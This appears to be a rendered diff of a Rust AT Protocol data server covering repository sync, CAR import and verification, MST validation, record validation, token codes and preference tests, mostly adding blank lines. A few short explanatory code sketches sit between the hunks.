43
48
#[derive(Debug, Serialize, Deserialize)]
44
49
pub struct IdentityFrame {
45
50
pub did: String,
···
48
53
pub seq: i64,
49
54
pub time: String,
50
55
}
56
+
51
57
#[derive(Debug, Serialize, Deserialize)]
52
58
pub struct AccountFrame {
53
59
pub did: String,
···
57
63
pub seq: i64,
58
64
pub time: String,
59
65
}
66
+
60
67
#[derive(Debug, Serialize, Deserialize)]
61
68
pub struct SyncFrame {
62
69
pub did: String,
···
66
73
pub seq: i64,
67
74
pub time: String,
68
75
}
76
+
69
77
pub struct CommitFrameBuilder {
70
78
pub seq: i64,
71
79
pub did: String,
···
75
83
pub blobs: Vec<String>,
76
84
pub time: chrono::DateTime<chrono::Utc>,
77
85
}
86
+
78
87
impl CommitFrameBuilder {
79
88
pub fn build(self) -> Result<CommitFrame, &'static str> {
80
89
let commit_cid = Cid::from_str(&self.commit_cid_str)
···
109
118
})
110
119
}
111
120
}
121
+
112
122
fn placeholder_rev() -> String {
113
123
use jacquard::types::{integer::LimitedU32, string::Tid};
114
124
Tid::now(LimitedU32::MIN).to_string()
115
125
}
126
+
116
127
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
117
128
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
118
129
}
130
+
119
131
impl TryFrom<SequencedEvent> for CommitFrame {
120
132
type Error = &'static str;
133
+
121
134
fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> {
122
135
let builder = CommitFrameBuilder {
123
136
seq: event.seq,
+15 src/sync/import.rs
···
9
9
use thiserror::Error;
10
10
use tracing::debug;
11
11
use uuid::Uuid;
12
+
12
13
#[derive(Error, Debug)]
13
14
pub enum ImportError {
14
15
#[error("CAR parsing error: {0}")]
···
36
37
#[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")]
37
38
DidMismatch { car_did: String, auth_did: String },
38
39
}
40
+
39
41
#[derive(Debug, Clone)]
40
42
pub struct BlobRef {
41
43
pub cid: String,
42
44
pub mime_type: Option<String>,
43
45
}
46
+
44
47
pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> {
45
48
let cursor = Cursor::new(data);
46
49
let mut reader = CarReader::new(cursor)
···
61
64
}
62
65
Ok((root, blocks))
63
66
}
67
+
64
68
pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> {
65
69
if depth > 32 {
66
70
return vec![];
···
91
95
_ => vec![],
92
96
}
93
97
}
98
+
94
99
pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> {
95
100
if depth > 32 {
96
101
return vec![];
···
124
129
_ => vec![],
125
130
}
126
131
}
132
+
127
133
pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) {
128
134
match value {
129
135
Ipld::Link(cid) => {
···
142
148
_ => {}
143
149
}
144
150
}
151
+
145
152
#[derive(Debug)]
146
153
pub struct ImportedRecord {
147
154
pub collection: String,
···
149
156
pub cid: Cid,
150
157
pub blob_refs: Vec<BlobRef>,
151
158
}
159
+
152
160
pub fn walk_mst(
153
161
blocks: &HashMap<Cid, Bytes>,
154
162
root_cid: &Cid,
···
219
227
}
220
228
Ok(records)
221
229
}
230
+
222
231
pub struct CommitInfo {
223
232
pub rev: Option<String>,
224
233
pub prev: Option<String>,
225
234
}
235
+
226
236
fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> {
227
237
let obj = match commit {
228
238
Ipld::Map(m) => m,
···
250
260
});
251
261
Ok((data_cid, CommitInfo { rev, prev }))
252
262
}
263
+
253
264
pub async fn apply_import(
254
265
db: &PgPool,
255
266
user_id: Uuid,
···
344
355
);
345
356
Ok(records)
346
357
}
358
+
347
359
#[cfg(test)]
348
360
mod tests {
349
361
use super::*;
362
+
350
363
#[test]
351
364
fn test_find_blob_refs() {
352
365
let record = serde_json::json!({
···
377
390
);
378
391
assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string()));
379
392
}
393
+
380
394
#[test]
381
395
fn test_find_blob_refs_no_blobs() {
382
396
let record = serde_json::json!({
···
386
400
let blob_refs = find_blob_refs(&record, 0);
387
401
assert!(blob_refs.is_empty());
388
402
}
403
+
389
404
#[test]
390
405
fn test_find_blob_refs_depth_limit() {
391
406
fn deeply_nested(depth: usize) -> JsonValue {
+3 src/sync/listener.rs
···
use sqlx::postgres::PgListener;
use std::sync::atomic::{AtomicI64, Ordering};
use tracing::{debug, error, info, warn};
+
static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0);
+
pub async fn start_sequencer_listener(state: AppState) {
    let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq")
        .fetch_one(&state.db)
···
        }
    });
}
+
async fn listen_loop(state: AppState) -> anyhow::Result<()> {
    let mut listener = PgListener::connect_with(&state.db).await?;
    listener.listen("repo_updates").await?;
+1 src/sync/mod.rs
+9 src/sync/repo.rs
···
14
14
use std::io::Write;
15
15
use std::str::FromStr;
16
16
use tracing::error;
17
+
17
18
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
18
20
#[derive(Deserialize)]
19
21
pub struct GetBlocksQuery {
20
22
pub did: String,
21
23
pub cids: String,
22
24
}
25
+
23
26
pub async fn get_blocks(
24
27
State(state): State<AppState>,
25
28
Query(query): Query<GetBlocksQuery>,
···
81
84
)
82
85
.into_response()
83
86
}
87
+
84
88
#[derive(Deserialize)]
85
89
pub struct GetRepoQuery {
86
90
pub did: String,
87
91
pub since: Option<String>,
88
92
}
93
+
89
94
pub async fn get_repo(
90
95
State(state): State<AppState>,
91
96
Query(query): Query<GetRepoQuery>,
···
177
182
)
178
183
.into_response()
179
184
}
185
+
180
186
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
181
187
match value {
182
188
Ipld::Link(cid) => {
···
195
201
_ => {}
196
202
}
197
203
}
204
+
198
205
#[derive(Deserialize)]
199
206
pub struct GetRecordQuery {
200
207
pub did: String,
201
208
pub collection: String,
202
209
pub rkey: String,
203
210
}
211
+
204
212
pub async fn get_record(
205
213
State(state): State<AppState>,
206
214
Query(query): Query<GetRecordQuery>,
···
209
217
use jacquard_repo::mst::Mst;
210
218
use std::collections::BTreeMap;
211
219
use std::sync::Arc;
220
+
212
221
let repo_row = sqlx::query!(
213
222
r#"
214
223
SELECT r.repo_root_cid
+8 src/sync/subscribe_repos.rs
···
10
10
use std::sync::atomic::{AtomicUsize, Ordering};
11
11
use tokio::sync::broadcast::error::RecvError;
12
12
use tracing::{error, info, warn};
13
+
13
14
const BACKFILL_BATCH_SIZE: i64 = 1000;
15
+
14
16
static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0);
17
+
15
18
#[derive(Deserialize)]
16
19
pub struct SubscribeReposParams {
17
20
pub cursor: Option<i64>,
18
21
}
22
+
19
23
#[axum::debug_handler]
20
24
pub async fn subscribe_repos(
21
25
ws: WebSocketUpgrade,
···
24
28
) -> Response {
25
29
ws.on_upgrade(move |socket| handle_socket(socket, state, params))
26
30
}
31
+
27
32
async fn send_event(
28
33
socket: &mut WebSocket,
29
34
state: &AppState,
···
33
38
socket.send(Message::Binary(bytes.into())).await?;
34
39
Ok(())
35
40
}
41
+
36
42
pub fn get_subscriber_count() -> usize {
37
43
SUBSCRIBER_COUNT.load(Ordering::SeqCst)
38
44
}
45
+
39
46
async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) {
40
47
let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1;
41
48
crate::metrics::set_firehose_subscribers(count);
···
45
52
crate::metrics::set_firehose_subscribers(count);
46
53
info!(subscribers = count, "Firehose subscriber disconnected");
47
54
}
55
+
48
56
async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> {
49
57
if let Some(cursor) = params.cursor {
50
58
let mut current_cursor = cursor;
+10 src/sync/util.rs
···
10
10
use std::io::Cursor;
11
11
use std::str::FromStr;
12
12
use tokio::io::AsyncWriteExt;
13
+
13
14
fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> {
14
15
Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string())
15
16
}
17
+
16
18
async fn write_car_blocks(
17
19
commit_cid: Cid,
18
20
commit_bytes: Option<Bytes>,
···
37
39
.map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?;
38
40
Ok(buffer.into_inner())
39
41
}
42
+
40
43
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
41
44
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
42
45
}
46
+
43
47
fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
44
48
let frame = IdentityFrame {
45
49
did: event.did.clone(),
···
56
60
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
57
61
Ok(bytes)
58
62
}
63
+
59
64
fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
60
65
let frame = AccountFrame {
61
66
did: event.did.clone(),
···
73
78
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
74
79
Ok(bytes)
75
80
}
81
+
76
82
async fn format_sync_event(
77
83
state: &AppState,
78
84
event: &SequencedEvent,
···
101
107
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
102
108
Ok(bytes)
103
109
}
110
+
104
111
pub async fn format_event_for_sending(
105
112
state: &AppState,
106
113
event: SequencedEvent,
···
168
175
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
169
176
Ok(bytes)
170
177
}
178
+
171
179
pub async fn prefetch_blocks_for_events(
172
180
state: &AppState,
173
181
events: &[SequencedEvent],
···
206
214
}
207
215
Ok(blocks_map)
208
216
}
217
+
209
218
fn format_sync_event_with_prefetched(
210
219
event: &SequencedEvent,
211
220
prefetched: &HashMap<Cid, Bytes>,
···
236
245
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
237
246
Ok(bytes)
238
247
}
248
+
239
249
pub async fn format_event_with_prefetched_blocks(
240
250
event: SequencedEvent,
241
251
prefetched: &HashMap<Cid, Bytes>,
+13 src/sync/verify.rs
···
8
8
use std::collections::HashMap;
9
9
use thiserror::Error;
10
10
use tracing::{debug, warn};
11
+
11
12
#[derive(Error, Debug)]
12
13
pub enum VerifyError {
13
14
#[error("Invalid commit: {0}")]
···
30
31
#[error("Invalid CBOR: {0}")]
31
32
InvalidCbor(String),
32
33
}
34
+
33
35
pub struct CarVerifier {
34
36
http_client: Client,
35
37
}
38
+
36
39
impl Default for CarVerifier {
37
40
fn default() -> Self {
38
41
Self::new()
39
42
}
40
43
}
44
+
41
45
impl CarVerifier {
42
46
pub fn new() -> Self {
43
47
Self {
···
47
51
.unwrap_or_default(),
48
52
}
49
53
}
54
+
50
55
pub async fn verify_car(
51
56
&self,
52
57
expected_did: &str,
···
80
85
prev: commit.prev().cloned(),
81
86
})
82
87
}
88
+
83
89
async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> {
84
90
let did_doc = self.resolve_did_document(did).await?;
85
91
did_doc
···
87
93
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?
88
94
.ok_or(VerifyError::NoSigningKey)
89
95
}
96
+
90
97
async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
91
98
if did.starts_with("did:plc:") {
92
99
self.resolve_plc_did(did).await
···
99
106
)))
100
107
}
101
108
}
109
+
102
110
async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
103
111
let plc_url = std::env::var("PLC_DIRECTORY_URL")
104
112
.unwrap_or_else(|_| "https://plc.directory".to_string());
···
123
131
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
124
132
Ok(doc.into_static())
125
133
}
134
+
126
135
async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
127
136
let domain = did
128
137
.strip_prefix("did:web:")
···
154
163
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
155
164
Ok(doc.into_static())
156
165
}
166
+
157
167
fn verify_mst_structure(
158
168
&self,
159
169
data_cid: &Cid,
160
170
blocks: &HashMap<Cid, Bytes>,
161
171
) -> Result<(), VerifyError> {
162
172
use ipld_core::ipld::Ipld;
173
+
163
174
let mut stack = vec![*data_cid];
164
175
let mut visited = std::collections::HashSet::new();
165
176
let mut node_count = 0;
···
246
257
Ok(())
247
258
}
248
259
}
260
+
249
261
#[derive(Debug, Clone)]
250
262
pub struct VerifiedCar {
251
263
pub did: String,
···
253
265
pub data_cid: Cid,
254
266
pub prev: Option<Cid>,
255
267
}
268
+
256
269
#[cfg(test)]
257
270
#[path = "verify_tests.rs"]
258
271
mod tests;
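A sketch of feeding verify_mst_structure by hand, in the style of the unit tests that follow; the node layout is the minimal empty-node case and the CID derivation mirrors the tests' helper, so treat it as an assumption rather than the canonical setup:

use ipld_core::ipld::Ipld;
use sha2::{Digest, Sha256};
use std::collections::{BTreeMap, HashMap};

// Sketch: an MST node whose entry list ("e") is empty is the smallest
// structure the walker accepts. Encode it, address it, verify it.
fn verify_empty_node() -> Result<(), VerifyError> {
    let verifier = CarVerifier::new();
    let node = Ipld::Map(BTreeMap::from([("e".to_string(), Ipld::List(vec![]))]));
    let encoded = serde_ipld_dagcbor::to_vec(&node).expect("encode node");
    let digest = Sha256::digest(&encoded);
    let mh = multihash::Multihash::wrap(0x12, &digest).expect("digest fits");
    let cid = cid::Cid::new_v1(0x71, mh);
    let mut blocks = HashMap::new();
    blocks.insert(cid, bytes::Bytes::from(encoded));
    verifier.verify_mst_structure(&cid, &blocks)
}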
+22 src/sync/verify_tests.rs
···
5
5
use cid::Cid;
6
6
use sha2::{Digest, Sha256};
7
7
use std::collections::HashMap;
8
+
8
9
fn make_cid(data: &[u8]) -> Cid {
9
10
let mut hasher = Sha256::new();
10
11
hasher.update(data);
···
12
13
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
13
14
Cid::new_v1(0x71, multihash)
14
15
}
16
+
15
17
#[test]
16
18
fn test_verifier_creation() {
17
19
let _verifier = CarVerifier::new();
18
20
}
21
+
19
22
#[test]
20
23
fn test_verify_error_display() {
21
24
let err = VerifyError::DidMismatch {
···
31
34
let err = VerifyError::MstValidationFailed("test error".to_string());
32
35
assert!(err.to_string().contains("test error"));
33
36
}
37
+
34
38
#[test]
35
39
fn test_mst_validation_missing_root_block() {
36
40
let verifier = CarVerifier::new();
···
41
45
let err = result.unwrap_err();
42
46
assert!(matches!(err, VerifyError::BlockNotFound(_)));
43
47
}
48
+
44
49
#[test]
45
50
fn test_mst_validation_invalid_cbor() {
46
51
let verifier = CarVerifier::new();
···
53
58
let err = result.unwrap_err();
54
59
assert!(matches!(err, VerifyError::InvalidCbor(_)));
55
60
}
61
+
56
62
#[test]
57
63
fn test_mst_validation_empty_node() {
58
64
let verifier = CarVerifier::new();
···
65
71
let result = verifier.verify_mst_structure(&cid, &blocks);
66
72
assert!(result.is_ok());
67
73
}
74
+
68
75
#[test]
69
76
fn test_mst_validation_missing_left_pointer() {
70
77
use ipld_core::ipld::Ipld;
78
+
71
79
let verifier = CarVerifier::new();
72
80
let missing_left_cid = make_cid(b"missing left");
73
81
let node = Ipld::Map(std::collections::BTreeMap::from([
···
84
92
assert!(matches!(err, VerifyError::BlockNotFound(_)));
85
93
assert!(err.to_string().contains("left pointer"));
86
94
}
95
+
87
96
#[test]
88
97
fn test_mst_validation_missing_subtree() {
89
98
use ipld_core::ipld::Ipld;
99
+
90
100
let verifier = CarVerifier::new();
91
101
let missing_subtree_cid = make_cid(b"missing subtree");
92
102
let record_cid = make_cid(b"record");
···
109
119
assert!(matches!(err, VerifyError::BlockNotFound(_)));
110
120
assert!(err.to_string().contains("subtree"));
111
121
}
122
+
112
123
#[test]
113
124
fn test_mst_validation_unsorted_keys() {
114
125
use ipld_core::ipld::Ipld;
126
+
115
127
let verifier = CarVerifier::new();
116
128
let record_cid = make_cid(b"record");
117
129
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
137
149
assert!(matches!(err, VerifyError::MstValidationFailed(_)));
138
150
assert!(err.to_string().contains("sorted"));
139
151
}
152
+
140
153
#[test]
141
154
fn test_mst_validation_sorted_keys_ok() {
142
155
use ipld_core::ipld::Ipld;
156
+
143
157
let verifier = CarVerifier::new();
144
158
let record_cid = make_cid(b"record");
145
159
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
167
181
let result = verifier.verify_mst_structure(&cid, &blocks);
168
182
assert!(result.is_ok());
169
183
}
184
+
170
185
#[test]
171
186
fn test_mst_validation_with_valid_left_pointer() {
172
187
use ipld_core::ipld::Ipld;
188
+
173
189
let verifier = CarVerifier::new();
174
190
let left_node = Ipld::Map(std::collections::BTreeMap::from([
175
191
("e".to_string(), Ipld::List(vec![])),
···
188
204
let result = verifier.verify_mst_structure(&root_cid, &blocks);
189
205
assert!(result.is_ok());
190
206
}
207
+
191
208
#[test]
192
209
fn test_mst_validation_cycle_detection() {
193
210
let verifier = CarVerifier::new();
···
200
217
let result = verifier.verify_mst_structure(&cid, &blocks);
201
218
assert!(result.is_ok());
202
219
}
220
+
203
221
#[tokio::test]
204
222
async fn test_unsupported_did_method() {
205
223
let verifier = CarVerifier::new();
···
209
227
assert!(matches!(err, VerifyError::DidResolutionFailed(_)));
210
228
assert!(err.to_string().contains("Unsupported"));
211
229
}
230
+
212
231
#[test]
213
232
fn test_mst_validation_with_prefix_compression() {
214
233
use ipld_core::ipld::Ipld;
234
+
215
235
let verifier = CarVerifier::new();
216
236
let record_cid = make_cid(b"record");
217
237
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
239
259
let result = verifier.verify_mst_structure(&cid, &blocks);
240
260
assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly");
241
261
}
262
+
242
263
#[test]
243
264
fn test_mst_validation_prefix_compression_unsorted() {
244
265
use ipld_core::ipld::Ipld;
266
+
245
267
let verifier = CarVerifier::new();
246
268
let record_cid = make_cid(b"record");
247
269
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
+16 src/util.rs
···
1
1
use rand::Rng;
2
2
use sqlx::PgPool;
3
3
use uuid::Uuid;
4
+
4
5
const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567";
6
+
5
7
pub fn generate_token_code() -> String {
6
8
generate_token_code_parts(2, 5)
7
9
}
10
+
8
11
pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String {
9
12
let mut rng = rand::thread_rng();
10
13
let chars: Vec<char> = BASE32_ALPHABET.chars().collect();
14
+
11
15
(0..parts)
12
16
.map(|_| {
13
17
(0..part_len)
···
17
21
.collect::<Vec<_>>()
18
22
.join("-")
19
23
}
24
+
20
25
#[derive(Debug)]
21
26
pub enum DbLookupError {
22
27
NotFound,
23
28
DatabaseError(sqlx::Error),
24
29
}
30
+
25
31
impl From<sqlx::Error> for DbLookupError {
26
32
fn from(e: sqlx::Error) -> Self {
27
33
DbLookupError::DatabaseError(e)
28
34
}
29
35
}
36
+
30
37
pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> {
31
38
sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
32
39
.fetch_optional(db)
33
40
.await?
34
41
.ok_or(DbLookupError::NotFound)
35
42
}
43
+
36
44
pub struct UserInfo {
37
45
pub id: Uuid,
38
46
pub did: String,
39
47
pub handle: String,
40
48
}
49
+
41
50
pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> {
42
51
sqlx::query_as!(
43
52
UserInfo,
···
48
57
.await?
49
58
.ok_or(DbLookupError::NotFound)
50
59
}
60
+
51
61
pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> {
52
62
sqlx::query_as!(
53
63
UserInfo,
···
58
68
.await?
59
69
.ok_or(DbLookupError::NotFound)
60
70
}
71
+
61
72
#[cfg(test)]
62
73
mod tests {
63
74
use super::*;
75
+
64
76
#[test]
65
77
fn test_generate_token_code() {
66
78
let code = generate_token_code();
67
79
assert_eq!(code.len(), 11);
68
80
assert!(code.contains('-'));
81
+
69
82
let parts: Vec<&str> = code.split('-').collect();
70
83
assert_eq!(parts.len(), 2);
71
84
assert_eq!(parts[0].len(), 5);
72
85
assert_eq!(parts[1].len(), 5);
86
+
73
87
for c in code.chars() {
74
88
if c != '-' {
75
89
assert!(BASE32_ALPHABET.contains(c));
76
90
}
77
91
}
78
92
}
93
+
79
94
#[test]
80
95
fn test_generate_token_code_parts() {
81
96
let code = generate_token_code_parts(3, 4);
82
97
let parts: Vec<&str> = code.split('-').collect();
83
98
assert_eq!(parts.len(), 3);
99
+
84
100
for part in parts {
85
101
assert_eq!(part.len(), 4);
86
102
}
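The tests above pin down the shape of these codes: lowercase base32 groups joined by '-'. A tiny sketch of the resulting length; the helper name is illustrative:

// Sketch: generate_token_code_parts(parts, part_len) yields
// parts * part_len characters plus (parts - 1) separators.
fn token_code_len(parts: usize, part_len: usize) -> usize {
    parts * part_len + parts.saturating_sub(1)
}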
+30 src/validation/mod.rs
···
1
1
use serde_json::Value;
2
2
use thiserror::Error;
3
+
3
4
#[derive(Debug, Error)]
4
5
pub enum ValidationError {
5
6
#[error("No $type provided")]
···
17
18
#[error("Unknown record type: {0}")]
18
19
UnknownType(String),
19
20
}
21
+
20
22
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
21
23
pub enum ValidationStatus {
22
24
Valid,
23
25
Unknown,
24
26
Invalid,
25
27
}
28
+
26
29
pub struct RecordValidator {
27
30
require_lexicon: bool,
28
31
}
32
+
29
33
impl Default for RecordValidator {
30
34
fn default() -> Self {
31
35
Self::new()
32
36
}
33
37
}
38
+
34
39
impl RecordValidator {
35
40
pub fn new() -> Self {
36
41
Self {
37
42
require_lexicon: false,
38
43
}
39
44
}
45
+
40
46
pub fn require_lexicon(mut self, require: bool) -> Self {
41
47
self.require_lexicon = require;
42
48
self
43
49
}
50
+
44
51
pub fn validate(
45
52
&self,
46
53
record: &Value,
···
83
90
}
84
91
Ok(ValidationStatus::Valid)
85
92
}
93
+
86
94
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
87
95
if !obj.contains_key("text") {
88
96
return Err(ValidationError::MissingField("text".to_string()));
···
127
135
}
128
136
Ok(())
129
137
}
138
+
130
139
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
131
140
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
132
141
let grapheme_count = display_name.chars().count();
···
148
157
}
149
158
Ok(())
150
159
}
160
+
151
161
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
152
162
if !obj.contains_key("subject") {
153
163
return Err(ValidationError::MissingField("subject".to_string()));
···
158
168
self.validate_strong_ref(obj.get("subject"), "subject")?;
159
169
Ok(())
160
170
}
171
+
161
172
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
162
173
if !obj.contains_key("subject") {
163
174
return Err(ValidationError::MissingField("subject".to_string()));
···
168
179
self.validate_strong_ref(obj.get("subject"), "subject")?;
169
180
Ok(())
170
181
}
182
+
171
183
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
172
184
if !obj.contains_key("subject") {
173
185
return Err(ValidationError::MissingField("subject".to_string()));
···
185
197
}
186
198
Ok(())
187
199
}
200
+
188
201
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
189
202
if !obj.contains_key("subject") {
190
203
return Err(ValidationError::MissingField("subject".to_string()));
···
202
215
}
203
216
Ok(())
204
217
}
218
+
205
219
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
206
220
if !obj.contains_key("name") {
207
221
return Err(ValidationError::MissingField("name".to_string()));
···
222
236
}
223
237
Ok(())
224
238
}
239
+
225
240
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
226
241
if !obj.contains_key("subject") {
227
242
return Err(ValidationError::MissingField("subject".to_string()));
···
234
249
}
235
250
Ok(())
236
251
}
252
+
237
253
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
238
254
if !obj.contains_key("did") {
239
255
return Err(ValidationError::MissingField("did".to_string()));
···
254
270
}
255
271
Ok(())
256
272
}
273
+
257
274
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
258
275
if !obj.contains_key("post") {
259
276
return Err(ValidationError::MissingField("post".to_string()));
···
263
280
}
264
281
Ok(())
265
282
}
283
+
266
284
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
267
285
if !obj.contains_key("policies") {
268
286
return Err(ValidationError::MissingField("policies".to_string()));
···
272
290
}
273
291
Ok(())
274
292
}
293
+
275
294
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
276
295
let obj = value
277
296
.and_then(|v| v.as_object())
···
296
315
Ok(())
297
316
}
298
317
}
318
+
299
319
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
300
320
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
301
321
return Err(ValidationError::InvalidDatetime {
···
304
324
}
305
325
Ok(())
306
326
}
327
+
307
328
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
308
329
if rkey.is_empty() {
309
330
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
···
324
345
}
325
346
Ok(())
326
347
}
348
+
327
349
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
328
350
if collection.is_empty() {
329
351
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
···
348
370
}
349
371
Ok(())
350
372
}
373
+
351
374
#[cfg(test)]
352
375
mod tests {
353
376
use super::*;
354
377
use serde_json::json;
378
+
355
379
#[test]
356
380
fn test_validate_post() {
357
381
let validator = RecordValidator::new();
···
365
389
ValidationStatus::Valid
366
390
);
367
391
}
392
+
368
393
#[test]
369
394
fn test_validate_post_missing_text() {
370
395
let validator = RecordValidator::new();
···
374
399
});
375
400
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
376
401
}
402
+
377
403
#[test]
378
404
fn test_validate_type_mismatch() {
379
405
let validator = RecordValidator::new();
···
385
411
let result = validator.validate(&record, "app.bsky.feed.post");
386
412
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
387
413
}
414
+
388
415
#[test]
389
416
fn test_validate_unknown_type() {
390
417
let validator = RecordValidator::new();
···
397
424
ValidationStatus::Unknown
398
425
);
399
426
}
427
+
400
428
#[test]
401
429
fn test_validate_unknown_type_strict() {
402
430
let validator = RecordValidator::new().require_lexicon(true);
···
407
435
let result = validator.validate(&record, "com.example.custom");
408
436
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
409
437
}
438
+
410
439
#[test]
411
440
fn test_validate_record_key() {
412
441
assert!(validate_record_key("valid-key_123").is_ok());
···
416
445
assert!(validate_record_key("").is_err());
417
446
assert!(validate_record_key("invalid/key").is_err());
418
447
}
448
+
419
449
#[test]
420
450
fn test_validate_collection_nsid() {
421
451
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
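A usage sketch matching the tests above, assuming validate takes the record and its collection NSID and returns a ValidationStatus on success; the wrapper function is illustrative:

use serde_json::json;

// Sketch: unknown lexicons come back as ValidationStatus::Unknown unless
// require_lexicon(true) turns them into hard errors.
fn check_post() -> Result<ValidationStatus, ValidationError> {
    let validator = RecordValidator::new();
    let record = json!({
        "$type": "app.bsky.feed.post",
        "text": "hello world",
        "createdAt": "2024-01-01T00:00:00.000Z"
    });
    validator.validate(&record, "app.bsky.feed.post")
}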
+11 tests/actor.rs
···
1
1
mod common;
2
2
use common::{base_url, client, create_account_and_login};
3
3
use serde_json::{json, Value};
4
+
4
5
#[tokio::test]
5
6
async fn test_get_preferences_empty() {
6
7
let client = client();
···
17
18
assert!(body.get("preferences").is_some());
18
19
assert!(body["preferences"].as_array().unwrap().is_empty());
19
20
}
21
+
20
22
#[tokio::test]
21
23
async fn test_get_preferences_no_auth() {
22
24
let client = client();
···
28
30
.unwrap();
29
31
assert_eq!(resp.status(), 401);
30
32
}
33
+
31
34
#[tokio::test]
32
35
async fn test_put_preferences_success() {
33
36
let client = client();
···
70
73
assert!(adult_pref.is_some());
71
74
assert_eq!(adult_pref.unwrap()["enabled"], true);
72
75
}
76
+
73
77
#[tokio::test]
74
78
async fn test_put_preferences_no_auth() {
75
79
let client = client();
···
85
89
.unwrap();
86
90
assert_eq!(resp.status(), 401);
87
91
}
92
+
88
93
#[tokio::test]
89
94
async fn test_put_preferences_missing_type() {
90
95
let client = client();
···
108
113
let body: Value = resp.json().await.unwrap();
109
114
assert_eq!(body["error"], "InvalidRequest");
110
115
}
116
+
111
117
#[tokio::test]
112
118
async fn test_put_preferences_invalid_namespace() {
113
119
let client = client();
···
132
138
let body: Value = resp.json().await.unwrap();
133
139
assert_eq!(body["error"], "InvalidRequest");
134
140
}
141
+
135
142
#[tokio::test]
136
143
async fn test_put_preferences_read_only_rejected() {
137
144
let client = client();
···
156
163
let body: Value = resp.json().await.unwrap();
157
164
assert_eq!(body["error"], "InvalidRequest");
158
165
}
166
+
159
167
#[tokio::test]
160
168
async fn test_put_preferences_replaces_all() {
161
169
let client = client();
···
208
216
assert_eq!(prefs_arr.len(), 1);
209
217
